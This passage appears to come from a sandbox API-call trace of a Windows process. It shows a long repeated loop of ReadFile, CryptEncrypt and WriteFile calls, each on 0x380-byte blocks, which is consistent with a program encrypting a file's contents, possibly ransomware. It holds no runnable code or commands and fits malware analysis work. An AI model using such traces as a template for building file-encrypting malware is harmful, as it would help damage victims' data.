lpBuffer=0x2f5ede8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.254] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5ede8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5ede8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.254] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5ede8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ede8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.254] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5ede8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ede8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.255] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5ede8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5ede8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.255] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5ede8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ede8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.255] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5ede8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ede8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.255] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5ede8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5ede8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.255] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5ede8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ede8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.255] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5ede8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ede8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.255] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5ede8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5ede8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.255] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5ede8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ede8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.255] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5ede8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ede8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.255] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5ede8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5ede8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.255] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5ede8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ede8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.255] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5ede8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ede8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.256] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5ede8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5ede8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.256] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5ede8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ede8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.256] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5ede8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ede8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.256] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5ede8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5ede8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.256] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5ede8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ede8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.256] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5ede8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ede8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.256] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5ede8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5ede8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.256] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5ede8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ede8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.257] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5ede8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ede8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.257] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5ede8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5ede8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.257] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5ede8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ede8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.257] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5ede8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ede8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.257] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5ede8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5ede8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.257] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5ede8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ede8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.257] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5ede8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ede8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.257] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5ede8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5ede8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.257] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5ede8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ede8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.257] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5ede8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ede8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.258] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5ede8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5ede8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.258] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5ede8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ede8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.258] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5ede8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ede8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.258] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5ede8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5ede8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.258] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5ede8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ede8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.258] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5ede8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ede8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.258] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5ede8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5ede8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.258] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5ede8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ede8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.258] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5ede8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ede8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.258] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5ede8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5ede8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.258] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5ede8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ede8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.258] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5ede8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ede8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.259] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5ede8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5ede8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.259] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5ede8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ede8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.259] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5ede8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ede8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.259] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5ede8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5ede8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.259] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5ede8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ede8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.259] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5ede8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ede8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.259] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5ede8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5ede8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.259] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5ede8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ede8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.259] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5ede8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ede8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.259] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5ede8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5ede8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.259] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5ede8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ede8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.259] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5ede8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ede8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.260] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5ede8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5ede8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.260] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5ede8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ede8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.260] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5ede8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ede8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.260] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5ede8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5ede8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.260] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5ede8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ede8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.260] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5ede8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ede8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.260] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5ede8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5ede8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.260] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5ede8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ede8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.260] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5ede8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ede8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.260] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5ede8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5ede8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.260] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5ede8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ede8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.260] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5ede8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ede8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.261] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5ede8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5ede8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.261] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5ede8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ede8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.261] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5ede8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ede8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.261] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5ede8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5ede8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.261] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5ede8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ede8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.261] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5ede8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ede8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.261] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5ede8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5ede8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.261] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5ede8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ede8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.261] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5ede8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ede8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.261] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5ede8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5ede8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.261] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5ede8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ede8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.261] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5ede8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ede8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.261] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5ede8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5ede8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.261] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5ede8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ede8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.262] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5ede8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ede8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.262] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5ede8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5ede8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.262] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5ede8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ede8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.262] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5ede8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ede8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.262] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5ede8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5ede8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.262] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5ede8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ede8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.262] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5ede8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ede8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.262] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5ede8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5ede8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.262] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5ede8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ede8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.262] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5ede8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ede8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.262] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5ede8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5ede8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.262] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5ede8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ede8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.263] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5ede8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ede8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.263] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5ede8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5ede8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.263] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5ede8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ede8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.263] ReadFile 